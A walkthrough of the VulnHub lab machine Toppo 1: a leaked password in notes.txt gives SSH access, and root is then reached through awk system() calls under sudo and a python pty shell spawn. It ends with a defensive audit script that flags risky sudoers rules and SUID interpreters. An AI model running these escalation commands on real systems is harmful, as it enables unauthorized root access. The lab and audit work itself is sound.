Toppo 1 | Walkthrough | VulnHub


This is the latest machine on VulnHub, created by Hadi Mene.





So let's begin enumeration with Nmap.



Meanwhile I was looking into the source code to get some information, but nothing special was there.

So I fired up Dirb to look for hidden directories. Below is the output of Dirb. So I started looking into all these directories.



While browsing through the directories, I found a notes.txt file in the admin directory. Below is the output for the same.




So in notes.txt, I found this note:

"Note to myself :

I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer."


As we know from the Nmap enumeration, ports 22 and 80 are open. So SSH is possible here; I took "ted" as the username (predicted) and "12345ted123" as the password.

And it worked. So what's next??





We got a successful login, so now let's move on to post-exploitation.

So I started checking the directories.




After checking, I found nothing here. So I decided to check the sudoers file (privileged users).



As we can see here, the ted user can execute awk without any credentials. This machine also covers the basic privilege escalation part through SUID.

Syntax: awk 'BEGIN {system("command")}' --> with the help of awk we can execute system commands.

If you are not familiar with SUID, follow the referred article and for privilege escalation through awk follow this article.



After executing the following commands, I got the Flag.

ted@Toppo:/tmp$ awk 'BEGIN {system("whoami")}'
root
ted@Toppo:/tmp$ awk 'BEGIN {system("ls -la /root")}'
total 24
drwx------  2 root root 4096 Apr 15 11:40 .
drwxr-xr-x 21 root root 4096 Apr 15 10:02 ..
-rw-------  1 root root   53 Apr 15 12:28 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  397 Apr 15 10:19 flag.txt
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
ted@Toppo:/tmp$ awk 'BEGIN {system("cat /root/flag.txt")}'
_________                                 
|  _   _  |                               
|_/ | | \_|.--.   _ .--.   _ .--.    .--. 
    | |  / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \
   _| |_ | \__. | | \__/ | | \__/ || \__. |
  |_____| '.__.'  | ;.__/  | ;.__/  '.__.' 
                 [__|     [__|             




Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}



You can also use this method:


ted@Toppo:~$ python2.7 -c 'import pty;pty.spawn("/bin/sh")'
# whoami
root
# ls
# ls -al
total 24
drwxr-xr-x 2 ted  ted  4096 Apr 15 11:19 .
drwxr-xr-x 3 root root 4096 Apr 15 10:08 ..
-rw------- 1 ted  ted    55 Jul 23 04:02 .bash_history
-rw-r--r-- 1 ted  ted   220 Apr 15 10:08 .bash_logout
-rw-r--r-- 1 ted  ted  3515 Apr 15 10:08 .bashrc
-rw-r--r-- 1 ted  ted   675 Apr 15 10:08 .profile
# cat /root/flag.txt
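
A defender-side check for the two misconfigurations this walkthrough relies on (a passwordless sudo rule for awk and set-uid interpreters such as awk and python2.7), added here as an example and not part of the original post. The interpreter list, the function names and the sample sudoers lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added audit sketch. RISKY is an assumed, non-exhaustive list of programs
# that can run other commands; extend it for your environment.
RISKY='awk|mawk|gawk|nawk|python[0-9.]*|perl|ruby|lua|php|node|vim?|find|env|bash|dash|sh'

# is_risky NAME: succeed when a program basename is on the list above.
is_risky() {
    printf '%s\n' "$1" | grep -Eqx "($RISKY)"
}

# audit_sudoers: read sudoers text on stdin and print "user<TAB>command" for
# each NOPASSWD command that is ALL or a listed interpreter. Aliases and
# included files are not expanded; review those separately.
audit_sudoers() {
    while read -r user rest; do
        case $user in ''|'#'*|Defaults*) continue ;; esac
        case $rest in *NOPASSWD:*) ;; *) continue ;; esac
        printf '%s\n' "${rest#*NOPASSWD:}" | tr ',' '\n' |
        while read -r cmd args; do
            # Flagged even when arguments are pinned, so a human reviews it.
            if [ "$cmd" = ALL ] || is_risky "${cmd##*/}"; then
                printf '%s\t%s\n' "$user" "$cmd"
            fi
        done
    done
}

# audit_suid DIR: print set-uid files under DIR whose name is a listed interpreter.
audit_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null |
    while IFS= read -r path; do
        if is_risky "${path##*/}"; then printf '%s\n' "$path"; fi
    done
}

# Constructed sample input (not taken from the Toppo machine).
SAMPLE_SUDOERS='# constructed sample
Defaults env_reset
root ALL=(ALL:ALL) ALL
ted ALL=(ALL) NOPASSWD: /usr/bin/awk
backup ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/python2.7 /opt/job.py
ops ALL=(ALL) NOPASSWD: ALL'

printf '%s\n' "$SAMPLE_SUDOERS" | audit_sudoers
# On a real host, as root: audit_sudoers < /etc/sudoers; audit_suid /
```

Any path reported by audit_suid is a candidate for removing the set-uid bit (chmod u-s), and any sudoers hit is a candidate for replacing the interpreter with a fixed, non-writable wrapper command.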



Thanks for reading.

